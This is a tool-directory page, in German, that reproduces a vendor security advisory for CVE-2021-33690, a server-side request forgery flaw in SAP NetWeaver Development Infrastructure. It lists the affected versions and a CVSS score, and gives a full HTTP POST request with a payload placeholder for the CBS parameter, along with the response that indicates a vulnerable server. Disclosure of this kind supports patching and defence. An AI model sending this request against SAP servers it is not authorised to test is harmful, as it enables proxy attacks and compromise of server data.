Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-33690 — [CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure | Kitploit
Tools/GitHubGitHub/redrays-io/cve-2021-33690
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubredrays-io/cve-2021-33690

CVE-2021-33690

[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2021-33690

[CVE-2021-33690] Server-Side Request Forgery-Schwachstelle in der SAP NetWeaver Development Infrastructure

root@kitploit:~
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

ADVISORY INFORMATION
Titel: [CVE-2021-33690] Server-Side Request Forgery-Schwachstelle in der SAP NetWeaver Development Infrastructure
Risiko: Kritisch
Advisory-URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Veröffentlichungsdatum: 1. Juni 2023

VULNERABILITY INFORMATION
Remote ausnutzbar: Ja
Lokal ausnutzbar: Nein

CVSS-Informationen
CVSS v3.1 Basis-Score: 9,9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

BESCHREIBUNG DER SCHWACHSTELLE
In verschiedenen Versionen des SAP NetWeaver Development Infrastructure Component Build Service, nämlich 7.11, 7.20, 7.30, 7.31, 7.40 und 7.50, wurde eine als Server-Side Request Forgery (SSRF) bekannte Schwachstelle identifiziert. Diese Schwachstelle im SAP NetWeaver Development Infrastructure Component Build Service ermöglicht es einem Angreifer mit Serverzugriff, über speziell zugeschnittene Abfragen Proxy-Angriffe durchzuführen. Die Folgen solcher Angriffe können zur vollständigen Kompromittierung sensibler Serverdaten führen und deren Verfügbarkeit beeinträchtigen. Es ist wichtig zu beachten, dass der Schweregrad dieser Schwachstelle davon abhängt, ob die SAP NetWeaver Development Infrastructure (NWDI) im Intranet oder im Internet betrieben wird. Der CVSS-Score wurde auf der Grundlage des schlimmsten Falls berechnet, bei dem das System online betrieben wird.

TECHNISCHE BESCHREIBUNG

Um festzustellen, ob der Server anfällig für SSRF ist, senden Sie die folgende Anfrage:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

Wenn die folgende Antwort empfangen wird, deutet dies auf das Vorhandensein der Schwachstelle hin:

<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>


Über RedRays
RedRays ist ein führendes Cybersicherheitsunternehmen, das ERP-Systeme vor internen betrügerischen Aktivitäten und externen Cyberbedrohungen schützt. Wir sind stolz darauf, robuste Sicherheitslösungen für große Unternehmen und Managed Service Provider anzubieten, die auf wichtige ERP-Systeme wie SAP, Oracle und Microsoft angewiesen sind. Mit Hilfe fortschrittlicher Tools und Strategien überwachen und kontrollieren wir proaktiv die Sicherheit in großen SAP-Umgebungen weltweit.

Unser Hauptziel ist es, die Sicherheitslücke sowohl aus technischer als auch aus geschäftlicher Sicht zu schließen, um einen reibungslosen Betrieb unserer Kunden zu gewährleisten und ihre wertvollen Daten zu schützen. Wir bei RedRays verpflichten uns, höchste Sicherheitsstandards aufrechtzuerhalten und gleichzeitig außergewöhnlichen Kundenservice und -unterstützung zu bieten.

Über RedRays F&E
Der Grundstein für die Erfolge von RedRays liegt in unserer Forschungs- und Entwicklungsabteilung (F&E), die sich auf die Untersuchung und Analyse von Schwachstellen in wichtigen Unternehmensanwendungen spezialisiert hat. Unsere F&E-Initiativen haben Anerkennung und Lob von führenden Softwareunternehmen wie SAP, Oracle, Microsoft Dynamics und IBM erhalten. Dieses Engagement für die Forschung ermöglicht es uns, aufkommende Bedrohungen vorherzusehen und maßgeschneiderte Sicherheitslösungen zu entwickeln, die den Anforderungen unserer Kunden gerecht werden.

Unser Team besteht aus erfahrenen Fachleuten mit vielfältigen Fähigkeiten in verschiedenen Sicherheitsbereichen, wie Schwachstellenbewertung, Penetrationstests, Incident Management und Threat Intelligence. Unser Engagement gilt der Durchführung gründlicher Forschung und der Bereitstellung avantgardistischer Lösungen, um SAP-Systeme gegen sich ständig ändernde Bedrohungen zu stärken.

Kontakt zu RedRays

Bei Fragen oder weiteren Details zögern Sie nicht, uns zu kontaktieren:

  • GitHub
  • E-Mail
  • Website
Tool herunterladen